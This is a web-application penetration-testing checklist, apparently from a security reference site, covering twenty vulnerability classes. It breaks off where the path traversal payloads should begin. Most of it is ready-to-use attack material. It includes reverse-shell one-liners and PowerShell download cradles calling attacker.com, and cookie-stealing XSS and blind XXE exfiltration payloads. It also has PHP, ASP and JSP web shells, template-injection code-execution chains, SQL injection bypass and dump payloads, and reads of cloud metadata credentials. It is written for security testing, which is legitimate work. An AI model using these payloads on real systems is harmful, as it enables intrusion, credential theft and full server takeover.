WEB APPLICATION
VAPT CHECKLIST

A complete penetration testing reference covering detection payloads, exploitation techniques, tools, and remediation guidance for all major web vulnerabilities.

30
Vulnerabilities
500+
Payloads
60+
Tools Listed
OWASP
Aligned
// View:
01
SQL INJECTION (SQLi)
User input inserted into SQL queries without sanitization, allowing DB manipulation.
Where to Test
  • Login Forms
  • Search Fields
  • URL Parameters
  • POST Body
  • Cookies
  • HTTP Headers
  • API JSON Params
  • Order/Filter Fields
Detection Payloads
Basic Error Triggers
' " ` '-- '# ');-- " OR "1"="1 ' OR '1'='1 1' 1" 1` \ ;; %27 %22
Boolean-Based Detection
1 AND 1=1 → normal response 1 AND 1=2 → different response (confirms SQLi) 1 AND 1=1-- - 1 AND 2>1 1 AND 'a'='a' 1 AND 'a'='b'
Exploitation Payloads
Authentication Bypass
admin'-- admin'# admin'/* ' OR 1=1-- ' OR 1=1# ' OR 1=1/* ') OR '1'='1'-- ' OR 'x'='x " OR "1"="1"-- admin' AND '1'='1 ' OR 1=1 LIMIT 1-- username=admin'--&password=anything username=' OR 1=1--&password=anything
UNION-Based (column discovery)
-- Step 1: Find number of columns ' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3-- ← error here = 2 columns -- Step 2: Find injectable position ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- -- Step 3: Extract data ' UNION SELECT username,password FROM users-- ' UNION SELECT table_name,NULL FROM information_schema.tables-- ' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
Error-Based (MySQL)
AND extractvalue(1,concat(0x7e,(SELECT version())))-- AND updatexml(1,concat(0x7e,(SELECT database())),1)-- ' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- ' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),(SELECT version()),CHAR(95),CHAR(33),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)--
Time-Based Blind SQLi
-- MySQL 1 AND SLEEP(5)-- ' AND SLEEP(5)-- 1; SELECT SLEEP(5)-- -- MSSQL 1; WAITFOR DELAY '0:0:5'-- ' WAITFOR DELAY '0:0:5'-- -- PostgreSQL 1; SELECT pg_sleep(5)-- ' OR pg_sleep(5)-- -- Oracle 1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
Out-of-Band / DNS Exfil
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.attacker.com\\a'))-- '; exec master..xp_dirtree '//attacker.com/a'-- (MSSQL) ' OR 1=1 INTO OUTFILE '/var/www/html/shell.php'--
Database Fingerprinting
-- MySQL ' AND SUBSTRING(version(),1,1)='5'-- -- PostgreSQL ' AND version() LIKE '%PostgreSQL%'-- -- MSSQL ' AND @@version LIKE '%Microsoft%'-- -- Oracle ' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--
Testing Method
Manual Steps 1. Identify all input vectors (forms, params, headers, cookies)
2. Inject a single quote (') and observe error messages
3. Try boolean-based payloads and compare responses
4. Use ORDER BY to determine column count
5. Use UNION SELECT to extract data
6. If blind, use time-based or DNS-exfil methods
7. Enumerate: version(), database(), tables, columns, data
Tools
SQLMapBurp Suite HavijjSQL BBQSQLNoSQLMap
sqlmap -u "https://target.com/item?id=1" --dbs sqlmap -u "https://target.com/item?id=1" -D dbname --tables sqlmap -u "https://target.com/item?id=1" -D dbname -T users --dump sqlmap -r request.txt --level=5 --risk=3 --batch sqlmap -u "https://target.com/" --data="user=a&pass=b" -p user --dbs
Impact
  • Full database dump (credentials, PII)
  • Authentication bypass
  • Data modification / deletion
  • Remote code execution (xp_cmdshell / UDF)
  • Server file read/write
References
02
NoSQL INJECTION
Injection into MongoDB, CouchDB, Redis queries via operator abuse or type confusion.
Where to Test
  • Login Forms
  • JSON POST body
  • URL params
  • API Endpoints
  • Search Fields
Detection Payloads
// URL parameter injection ?username[$ne]=test ?username[$gt]= ?username[$regex]=.* // JSON body injection {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$gt": ""}, "password": {"$gt": ""}} {"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
Exploitation Payloads
Authentication Bypass (MongoDB)
// POST body - JSON {"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}} {"username": "admin", "password": {"$ne": "wrong"}} {"username": {"$gt": ""}, "password": {"$gt": ""}} {"username": {"$regex": "^admin"}, "password": {"$ne": ""}} // URL param style username[$ne]=toto&password[$ne]=toto login[$regex]=a.*&password[$ne]=lol username[$exists]=true&password[$exists]=true
Data Extraction (Blind - MongoDB)
// Extract field character by character {"username": {"$regex": "^a"}, "password": {"$ne": ""}} {"username": {"$regex": "^ad"}, "password": {"$ne": ""}} {"username": {"$regex": "^adm"}, "password": {"$ne": ""}} // JavaScript injection ($where) {"$where": "this.username == 'admin'"} {"$where": "sleep(5000)"} // time-based {"$where": "return (this.password.match(/^a/))"} // $lookup abuse {"username": {"$lookup": {"from": "users"}}}
Redis Injection
// CRLF injection into Redis commands test\r\nSET injected "hacked"\r\n test\r\nCONFIG SET dir /var/www/html\r\n test\r\nCONFIG SET dbfilename shell.php\r\n
Tools
NoSQLMapBurp Suitenosqli
nosqlmap --attack db --url "http://target.com/login" --postdata "user=INJECT&pass=test"
Impact
  • Authentication bypass
  • Data exfiltration
  • DoS via slow queries
References
03
OS COMMAND INJECTION
Application passes user input to shell commands without sanitization.
Where to Test
  • Ping/Traceroute tools
  • File conversion features
  • Email fields
  • Filename params
  • DNS lookup tools
  • Network utils
Detection Payloads
; ls | ls || ls & ls && ls ` ls ` $(ls) ; sleep 5 | sleep 5 || sleep 5 ; ping -c 5 attacker.com $(ping -c 1 attacker.com)
Exploitation Payloads
Linux Payloads
; id; whoami; uname -a | cat /etc/passwd && cat /etc/shadow ; ls -la / $(cat /etc/passwd) `cat /etc/passwd` ; curl http://attacker.com/$(whoami) ; bash -i >& /dev/tcp/attacker.com/4444 0>&1 ; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' ; wget http://attacker.com/shell.sh -O /tmp/s.sh && chmod +x /tmp/s.sh && /tmp/s.sh
Windows Payloads
& dir | type C:\Windows\win.ini & whoami & ipconfig /all & net user & powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" & cmd /c "certutil -urlcache -split -f http://attacker.com/nc.exe c:\nc.exe"
Blind OS Command Injection
// Time-based detection ; sleep 10 || ping -c 10 127.0.0.1 // Out-of-band detection ; nslookup attacker.com ; curl http://burp-collab.com/$(whoami) ; wget http://attacker.com/?output=$(id|base64)
WAF Bypass Techniques
;{ls,-la} ;l\s ;/bin/l's' ;$(printf '\x6c\x73') # ls hex encoded ;$IFS$9ls # IFS bypass ;cat$IFS/etc/passwd ;c${u}at /etc/passwd
Testing Method
Manual Steps 1. Find parameters passed to system functions
2. Inject command separators (;, |, &, &&, ||)
3. Use time-delay to confirm blind injection (sleep 5)
4. Use out-of-band (DNS/HTTP) to exfiltrate data
5. Escalate to full shell access
Tools
Burp SuitecommixBurp Collaborator
commix --url="http://target.com/ping?host=INJECT" --level=3
Impact
  • Full server compromise
  • Reverse shell / RCE
  • File system access
  • Lateral movement
References
04
LDAP INJECTION
Manipulating LDAP queries to bypass authentication or extract directory data.
Where to Test
  • Login Forms
  • Directory Search
  • User Lookup fields
  • Corporate SSO
Detection & Exploitation Payloads
// Authentication bypass *)(uid=*))(|(uid=* admin)(&) admin)(|(password=*) *)(|(objectclass=*)) // Blind extraction - enumerate characters *)(uid=a* → returns users starting with 'a' *)(uid=ad* → continue character by character // Full LDAP filter bypass user=*)(|(cn=*) pass=))%00 // Extract all users *)(|(cn=*))%00 *))%00 // DN injection admin)(|(userPassword=*) *)(objectclass=*))(|(objectclass=*
Tools
Burp Suiteldap-bruteOWASP ZAP
Impact
  • Authentication bypass
  • Directory enumeration
  • Credential harvesting
References
05
XPATH / XML INJECTION
Injecting into XPath expressions or XML parsers to bypass auth or extract data.
Detection Payloads
' " 'or '1'='1 ' or '1'='1 " or "1"="1 ' or ''=' x' or 1=1 or 'x'='y ' and count(/*)=1 and '1'='1
Authentication Bypass
// XPath 1.0 bypass ' or '1'='1 ' or 1=1 or ''=' ") or "1"="1 admin' or '1'='1 // Extract node names ' or name()='user' or '1'=' ' and substring(name(/*[1]),1,1)='u' or '1'='
XML Entity Injection
// Detect XML parsing <?xml version="1.0"?> <!DOCTYPE test [<!ENTITY test SYSTEM "file:///etc/passwd">]> <user>&test;</user> // SSRF via XXE (see XXE section for full list)
Tools
Burp SuitexcatOWASP ZAP
References
06
SERVER-SIDE TEMPLATE INJECTION (SSTI)
Injecting template syntax that is evaluated by the server-side template engine.
Where to Test
  • URL Parameters
  • Form Fields
  • Email Templates
  • User Profile fields
  • Error Pages
  • Headers (User-Agent)
Detection - Identify Engine
// Generic polyglot detection (inject and observe output) {{7*7}} → 49 (Jinja2/Twig) ${7*7} → 49 (FreeMarker/Thymeleaf) <%= 7*7 %> → 49 (ERB/Ruby) #{7*7} → 49 (Ruby) *{7*7} → 49 (Thymeleaf) {{7*'7'}} → 7777777 (Jinja2) vs 49 (Twig) ${{7*7}} {{config}} → Jinja2 config dump #{T(java.lang.Runtime).getRuntime()}
Exploitation by Engine
Jinja2 (Python/Flask)
{{config}} {{config.__class__.__init__.__globals__['os'].popen('id').read()}} {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} {{''.__class__.mro()[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}} {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}} {%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__']['__import__']('os').system('id')}}{%endif%}{%endfor%}
Twig (PHP)
{{7*7}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id']|filter('system')}} {{['cat /etc/passwd']|filter('passthru')}} {{app.request.server.all|join(',')}} {%set a='id'%}{{a|system}}
FreeMarker (Java)
${"freemarker.template.utility.Execute"?new()("id")} <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ex('id')}
ERB (Ruby)
<%= system('id') %> <%= `id` %> <%= IO.popen('id').read %>
Velocity (Java)
#set($x='')## #set($rt = $x.class.forName('java.lang.Runtime')) #set($chr = $x.class.forName('java.lang.Character')) #set($str = $x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() #set($out = $ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
Tools
tplmapBurp SuiteSSTImap
tplmap -u "http://target.com/page?name=INJECT" sstimap -u "http://target.com/?tmpl=INJECT" --os-shell
Impact
  • Remote Code Execution
  • Full server takeover
  • File read/write
References
07
REFLECTED XSS
Malicious script reflected from server in the HTTP response, executed in victim's browser.
Where to Test
  • URL Parameters
  • Search Fields
  • Error Messages
  • Referrer Header
  • User-Agent
  • Redirect params
Detection Payloads
// Basic detection - look for reflection in source "><script>alert(1)</script> '><script>alert(1)</script> "><img src=x onerror=alert(1)> javascript:alert(1) <svg onload=alert(1)> '';!--"<XSS>=&{()} %3Cscript%3Ealert(1)%3C/script%3E // URL encoded
Context-Aware Payloads
HTML Context
<script>alert(document.domain)</script> <img src=x onerror=alert(1)> <body onload=alert(1)> <svg/onload=alert(1)> <iframe onload=alert(1)></iframe> <details open ontoggle=alert(1)> <video><source onerror=alert(1)> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)>
Attribute Context (inside an attribute)
" onmouseover="alert(1) " onfocus="alert(1)" autofocus=" ' onclick='alert(1) " style="animation-name:spinning" onanimationstart="alert(1)
JavaScript Context
'-alert(1)-' ';alert(1)// \';alert(1)// </script><script>alert(1)</script> "-alert(1)-"
WAF Bypass Payloads
<ScRiPt>alert(1)</ScRiPt> <script>alert`1`</script> <img src=x oNeRrOr=alert(1)> <svg onload=&#97;lert(1)> <svg onload=alert&#40;1&#41;> <img src=x onerror="&#97;&#108;&#101;&#114;&#116;(1)"> <a href="java&#115;cript:alert(1)">click</a> <svg><script>alert(1)</script></svg> <<script>alert(1)//<</script> <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script> <img src="javascript:alert(1)"> <object data="javascript:alert(1)"> <embed src="javascript:alert(1)"> <math><a xlink:href="javascript:alert(1)">click</a></math>
Cookie Stealing Payload
<script>document.location='http://attacker.com/steal?c='+document.cookie</script> <img src=x onerror="fetch('http://attacker.com/steal?c='+btoa(document.cookie))"> <svg onload="new Image().src='http://attacker.com/?c='+document.cookie">
Tools
Burp SuiteXSStrikeOWASP ZAPdalfoxXSSer
xsstrike -u "http://target.com/search?q=INJECT" dalfox url "http://target.com/search?q=INJECT"
Impact
  • Session hijacking
  • Cookie theft
  • Phishing / defacement
  • Keylogging
  • Credential harvesting
References
08
STORED XSS (Persistent)
Malicious script stored in database and served to all users who view the infected content.
Where to Test
  • Comments / Forums
  • User Profile fields
  • Product Reviews
  • Admin Panels
  • Log viewers
  • File names
Key Payloads
<script>alert(document.domain)</script> <img src=x onerror=alert(1)> <svg/onload=alert(1)> // Blind XSS (fire when admin views logs) "><script src=//attacker.com/xss.js></script> <img src=x onerror="var x=new XMLHttpRequest();x.open('GET','//attacker.com/?c='+document.cookie);x.send()"> // Polyglot javascript:/*--></title></style></textarea></script></xmp> <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> // XSS via file upload (SVG) // Upload a .svg file containing: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"> <rect width="300" height="100" style="fill:rgb(0,0,255)"/> </svg>
Blind XSS Tools
XSS HunterBurp CollaboratorCanaryTokens
Impact
  • Mass session hijacking
  • Admin account takeover
  • Worm propagation
  • Site-wide defacement
References
09
DOM-BASED XSS
Payload executed through client-side script DOM manipulation without server reflection.
Common Sources (Attacker Controls)
DOM Sourcesdocument.URL, document.location, document.referrer, window.location.hash, window.location.search, document.cookie, localStorage, sessionStorage, postMessage data
Common Sinks (Dangerous Functions)
DOM Sinksdocument.write(), innerHTML, outerHTML, eval(), setTimeout(), setInterval(), Function(), document.domain, element.src, element.href, location.href
Detection & Exploitation
// URL hash-based http://target.com/page#<img src=x onerror=alert(1)> http://target.com/page#<svg onload=alert(1)> // location.search-based http://target.com/page?search=<script>alert(1)</script> // postMessage-based // Craft a malicious page that sends: window.opener.postMessage("<img src=x onerror=alert(1)>","*") // AngularJS sandbox escape {{constructor.constructor('alert(1)')()}} {{$on.constructor('alert(1)')()}} {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} // DOM clobbering <form id=x><input id=attributes></form>
Tools
DOM Invader (Burp)DOMDiggerJSShell
References
10
CLICKJACKING
Tricking users into clicking invisible iframed elements to perform unintended actions.
Detection
Check Response HeadersMissing X-Frame-Options header
Missing Content-Security-Policy: frame-ancestors directive
Test: try embedding target in an iframe
// Test PoC - save as HTML and open <html> <head><style> iframe { width:500px; height:700px; position:absolute; top:-100px; left:-200px; opacity:0.0001; z-index:2; } button { position:absolute; top:300px; left:100px; z-index:1; } </style></head> <body> <button>CLICK ME - WIN A PRIZE!</button> <iframe src="https://target.com/delete-account"></iframe> </body> </html>
Tools
Burp Suiteclickjacker.pyOWASP ZAP
Impact
  • Forced actions (delete, transfer)
  • Social engineering attacks
  • XSS delivery
References
11
CROSS-SITE REQUEST FORGERY (CSRF)
Forces an authenticated user to execute unwanted actions on a web application.
Where to Test
  • State-changing actions
  • Password change
  • Email change
  • Money transfer
  • Profile update
  • Delete actions
Detection
Check for Absence of CSRF token in forms
Predictable / reusable CSRF tokens
Token not validated server-side
CSRF token in URL (leaks in Referrer)
Missing SameSite cookie attribute
Exploitation PoC
GET-based CSRF
// Victim visits attacker page, this fires automatically <img src="https://target.com/transfer?to=attacker&amount=1000"> <iframe src="https://target.com/delete-account?confirm=yes"></iframe>
POST-based CSRF (Auto-Submit Form)
<!DOCTYPE html> <html> <body onload="document.forms[0].submit()"> <form action="https://target.com/change-email" method="POST"> <input type="hidden" name="email" value="attacker@evil.com"> <input type="hidden" name="confirm_email" value="attacker@evil.com"> </form> </body> </html>
CSRF Token Bypass Techniques
// 1. Delete CSRF token parameter entirely // 2. Use another user's valid CSRF token // 3. Change POST to GET (token validated only on POST) // 4. Double submit cookie bypass - set your own cookie // 5. Token tied to session but not to action - replay in different action // 6. SameSite=None without Secure flag // 7. Referer header bypass - add ?target.com to attacker URL // http://attacker.com/?victim.com
JSON CSRF (Content-Type bypass)
<form enctype="text/plain" action="https://target.com/api/update" method="POST"> <input name='{"email":"attacker@evil.com","x":"' value='"}'> </form>
Tools
Burp Suite (CSRF PoC generator)OWASP ZAP
Impact
  • Account takeover
  • Unauthorized fund transfer
  • Data modification
References
12
SERVER-SIDE REQUEST FORGERY (SSRF)
Making the server issue requests to unintended internal or external resources.
Where to Test
  • URL parameters
  • Webhook URLs
  • PDF generators
  • Image fetch
  • Import features
  • Proxy params
Detection Payloads
// Internal service probing http://127.0.0.1/ http://localhost/ http://0.0.0.0/ http://[::1]/ http://169.254.169.254/ (AWS metadata) http://192.168.0.1/ http://10.0.0.1/ // Out-of-band detection http://burp-collaborator.com/ http://attacker.com/ssrf-test
Exploitation Payloads
Cloud Metadata Endpoints
// AWS http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/user-data/ // GCP http://metadata.google.internal/computeMetadata/v1/ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token // Azure http://169.254.169.254/metadata/instance?api-version=2021-02-01 // DigitalOcean http://169.254.169.254/metadata/v1/
Protocol Schemes
file:///etc/passwd file:///etc/hosts file:///proc/self/environ dict://127.0.0.1:6379/info (Redis) gopher://127.0.0.1:6379/_INFO%0D%0A (Redis via Gopher) ftp://127.0.0.1:21/ sftp://attacker.com:11111/ tftp://attacker.com/test ldap://127.0.0.1:389/ http://127.0.0.1:8080/admin http://127.0.0.1:8500/v1/kv/ (Consul) http://127.0.0.1:5601 (Kibana) http://127.0.0.1:9200/_cat/indices (Elasticsearch)
Bypass Techniques
// Decimal IP http://2130706433/ (127.0.0.1) // Octal IP http://0177.0.0.1/ // Hex IP http://0x7f000001/ // IPv6 http://[::ffff:127.0.0.1]/ // URL shortener (redirect) http://bit.ly/ssrf-test → redirects to 127.0.0.1 // DNS rebinding http://1u.ms/127.0.0.1/ // Double encoding http://127。0.0.1/ (Unicode dot) // Open redirect chained with SSRF /redirect?url=http://169.254.169.254/
Tools
Burp Suite + CollaboratorSSRFmapGopherusinteractsh
ssrfmap -r request.txt -p url --module readfiles gopherus --exploit redis # Generate gopher payload for Redis
Impact
  • Internal network scanning
  • Cloud credential theft
  • Internal service exploitation
  • RCE via metadata service
References
13
XML EXTERNAL ENTITY (XXE)
XML input processed with external entity references enabled, allowing file read and SSRF.
Where to Test
  • XML POST requests
  • SOAP endpoints
  • File upload (docx/xlsx/svg)
  • APIs accepting XML
  • Content-Type: application/xml
Basic XXE Payloads
// File read <?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root> // Windows <?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]> <root>&xxe;</root> // /etc/hosts <?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]> <stockCheck><productId>&xxe;</productId></stockCheck>
Advanced XXE Payloads
SSRF via XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]> <root>&xxe;</root> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/">]> <root>&xxe;</root>
Blind XXE (Out-of-Band Exfil)
// Attacker hosts evil.dtd at http://attacker.com/evil.dtd: <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>"> %eval; %exfil; // Payload sent to target: <?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]> <foo>test</foo>
XXE via SVG Upload
// Upload as .svg file <?xml version="1.0" standalone="yes"?> <!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"> <text font-size="16" x="0" y="16">&xxe;</text> </svg>
XXE via DOCX/XLSX/PDF
// Unzip docx, edit word/document.xml, inject XXE, rezip // OR inject into xl/workbook.xml for XLSX
Parameter Entity (when regular blocked)
<!DOCTYPE foo [ <!ENTITY % a "<!ENTITY b SYSTEM 'http://attacker.com/'>"> %a; ]> <root>&b;</root>
Tools
Burp SuiteXXEinjectorBurp Collaborator
python XXEinjector.py --host=attacker.com --path=/etc/passwd --file=req.txt
Impact
  • Arbitrary file read
  • SSRF / internal network access
  • DoS (billion laughs)
  • Data exfiltration
References
14
HTTP REQUEST SMUGGLING
Desync between front-end and back-end servers using conflicting Content-Length / Transfer-Encoding.
Detection Payloads
CL.TE (Content-Length takes priority at front-end)
POST / HTTP/1.1 Host: target.com Content-Length: 6 Transfer-Encoding: chunked 3 abc X
TE.CL (Transfer-Encoding takes priority at front-end)
POST / HTTP/1.1 Host: target.com Content-Length: 3 Transfer-Encoding: chunked 1 Z Q
TE.TE (Obfuscated Transfer-Encoding headers)
Transfer-Encoding: xchunked Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked [space]Transfer-Encoding: chunked X: X[\n]Transfer-Encoding: chunked Transfer-Encoding : chunked
Exploit: Bypass Front-End Security Controls
POST / HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 130 Transfer-Encoding: chunked 0 POST /admin HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1
Tools
Burp HTTP Request Smugglersmuggler.pyh2csmuggler
Impact
  • Bypass security controls
  • Session hijacking
  • XSS delivery
  • Cache poisoning
References
15
BROKEN AUTHENTICATION
Weaknesses in session management, credential handling, and authentication mechanisms.
Test Areas
  • Login form
  • Password reset
  • Remember me
  • Session tokens
  • MFA bypass
  • Account lockout
Testing Techniques & Payloads
Default Credentials
admin:admin admin:password admin:admin123 admin:123456 root:root root:toor guest:guest test:test user:user administrator:administrator
Username Enumeration
// Observe response differences: // - Timing differences // - Different HTTP status codes // - Different error messages // Valid user: "Password is incorrect" // Invalid user: "User does not exist" // Brute force usernames: admin, administrator, root, user, test, info, webmaster, support
Password Reset Flaws
// Host header injection in reset email: POST /reset-password Host: attacker.com ← inject here // Predictable reset token // Token in URL (Referer leak) // Token not expiring // Reuse of old tokens
Session Token Testing
// Collect multiple tokens and analyze entropy // Test if token is base64/JWT/sequential // Test session fixation: // 1. Get session ID before login // 2. Log in // 3. Check if session ID changed (if not → fixation vuln) // Test session termination: // After logout, use old session token - does it still work?
MFA Bypass
// Response manipulation: change "success":false to "success":true // Code brute force: try 000000-999999 (if no rate limit) // Use backup codes // Skip MFA step entirely by going directly to post-auth URL // Response body tamper after MFA check
Tools
Burp Suite IntruderHydraMedusaPatator
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Impact
  • Account takeover
  • Privilege escalation
  • Full application compromise
References
16
INSECURE DIRECT OBJECT REFERENCE (IDOR)
Accessing or modifying resources by guessing/changing object identifiers without authorization checks.
Where to Test
  • User IDs in URLs
  • Order IDs
  • File names
  • API endpoints
  • Account numbers
  • Document IDs
Detection & Exploitation
// Numeric ID manipulation GET /api/user/1001 → change to /api/user/1000 GET /invoice?id=5432 → change to /invoice?id=5431 DELETE /api/post/99 → try another user's post ID // UUID/GUID (harder but possible) GET /api/orders/a4b12c3d-... → find other UUIDs via leakage // Parameter pollution GET /api/profile?userId=1001&userId=1000 // HTTP method switching POST /api/user/1001 → PUT /api/user/1000 // Encoded IDs base64: dXNlcjoxMDAx → decode → user:1001 → change to user:1000 → encode // Mass assignment / JSON parameter abuse {"id": 1001} → change to {"id": 1000} {"userId": "me"} → change to {"userId": "admin"}
IDOR Types
Types to Test Horizontal IDOR: Access another user's same-level resource
Vertical IDOR: Access higher-privilege resource (admin panel)
Blind IDOR: No direct response, but data modified
Reference in body: JSON/XML body parameter
Reference in cookie: Session or user tracking cookie
Tools
Burp Suite (Authorize extension)AuthMatrix
Impact
  • Unauthorized data access
  • Account takeover
  • Data modification/deletion
References
17
JWT VULNERABILITIES
Exploiting weak JWT implementations: algorithm confusion, none algorithm, weak secrets.
JWT Structure
Formatheader.payload.signature (base64url encoded)
Decode: echo "eyJ..." | base64 -d
Attack Techniques
1. None Algorithm Attack
// Modify header to: {"alg": "none", "typ": "JWT"} // Remove signature (trailing dot remains) // eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
2. Weak Secret Brute Force
hashcat -a 0 -m 16500 jwt_token.txt wordlist.txt john --wordlist=wordlist.txt --format=HMAC-SHA256 jwt.txt # Common weak secrets: secret, password, 123456, jwt_secret
3. RS256 to HS256 Algorithm Confusion
// If server uses RS256, get public key (often exposed) // Sign JWT with public key using HS256 // Server may verify HS256 using the public key as secret // Tools: jwt_tool, portswigger jwt editor
4. JWK Header Injection
// Modify header to include your own public key: { "alg": "RS256", "jwk": { "kty": "RSA", "e": "AQAB", "n": "attacker-public-key-n..." } } // Sign with corresponding private key
5. Kid Parameter Injection
// kid = key ID used to select signing key // Inject SQL into kid: {"kid": "' UNION SELECT 'attacker_secret' --"} // Or path traversal: {"kid": "../../dev/null"} // sign with empty key
6. Claim Manipulation
// Decode → modify claims → re-sign (if secret known) {"sub": "user123"} → {"sub": "admin"} {"role": "user"} → {"role": "admin"} {"exp": 1700000000} → {"exp": 9999999999} // never expires
Tools
jwt_toolBurp JWT Editorhashcatjwt.io
python3 jwt_tool.py -t https://target.com -rh "Authorization: Bearer JWT" -M at python3 jwt_tool.py JWT -X a # None algorithm attack python3 jwt_tool.py JWT -C -d wordlist.txt # Crack secret
Impact
  • Authentication bypass
  • Privilege escalation
  • Account takeover
References
18
OAUTH 2.0 FLAWS
Misconfigured OAuth flows leading to account takeover via token/code theft.
Common Vulnerabilities
// 1. Open redirect in redirect_uri /oauth/authorize?client_id=X&redirect_uri=https://attacker.com/callback // 2. State parameter missing (CSRF on OAuth) // No state= parameter → forge auth request → steal code // 3. Authorization code interception // Referrer header leaks code to third-party resources on callback page // 4. Token leakage in browser history (implicit flow) // Token in URL fragment → logged in browser history // 5. Scope escalation // Request: scope=email // Replay with: scope=email%20profile%20admin // 6. PKCE bypass // code_challenge_method=plain → weak protection // 7. Account linking abuse // Link attacker-controlled email to victim account via OAuth // 8. JWT none algorithm in ID token // See JWT section
Tools
Burp SuiteOAuth 2.0 tester
References
19
FILE UPLOAD VULNERABILITIES
Uploading malicious files (webshells) to achieve RCE on the server.
Attack Vectors
Web Shell Payloads
// PHP Web Shell <?php system($_GET['cmd']); ?> <?php echo shell_exec($_REQUEST['cmd']); ?> <?php passthru($_GET['c']); ?> <?php eval($_POST['code']); ?> // ASP Web Shell <% eval request("cmd") %> // JSP Web Shell <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> // Simple PHP shell as image // Prepend GIF header, save as shell.php: GIF89a;<?php system($_GET['cmd']); ?>
Extension Bypass Techniques
// Double extension shell.php.jpg shell.jpg.php // Null byte (old servers) shell.php%00.jpg shell.php\0.jpg // Case variation shell.pHp shell.PHP shell.PhP // Less common extensions (check server config) shell.php3 shell.php4 shell.php5 shell.phtml shell.phar shell.shtml shell.shtm // Alternative extension with .htaccess trick: // Upload .htaccess with: AddType application/x-httpd-php .jpg // Then upload shell.jpg
Content-Type Bypass
// Change MIME type in request: Content-Type: image/jpeg ← even if file is PHP Content-Type: image/gif Content-Type: image/png // Add magic bytes to PHP shell: GIF89a; <?php system($_GET['cmd']); ?> // Or JPEG magic: \xff\xd8\xff\xe0 then PHP code
SVG/XML XSS via Upload
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"> <circle cx="50" cy="50" r="50"/> </svg>
Path Traversal in Filename
// Filename in upload: ../../../var/www/html/shell.php ..%2F..%2Fshell.php ....//shell.php
Testing Method
Steps 1. Upload .php file → observe if blocked (check extension, MIME, magic bytes)
2. Bypass extension checks (see above)
3. Bypass MIME type checks (modify Content-Type)
4. Find the upload directory (robots.txt, forced browsing)
5. Request uploaded file to trigger execution
Tools
Burp Suiteweevelyfuzz-ext list
Impact
  • Remote Code Execution
  • Full server takeover
  • Data exfiltration
  • Malware hosting
References
20
PATH TRAVERSAL / DIRECTORY TRAVERSAL
Reading arbitrary files outside web root using ../ sequences in file parameters.
Where to Test
  • File download params
  • Image display params
  • Template includes
  • Language files
  • PDF generation
Payloads
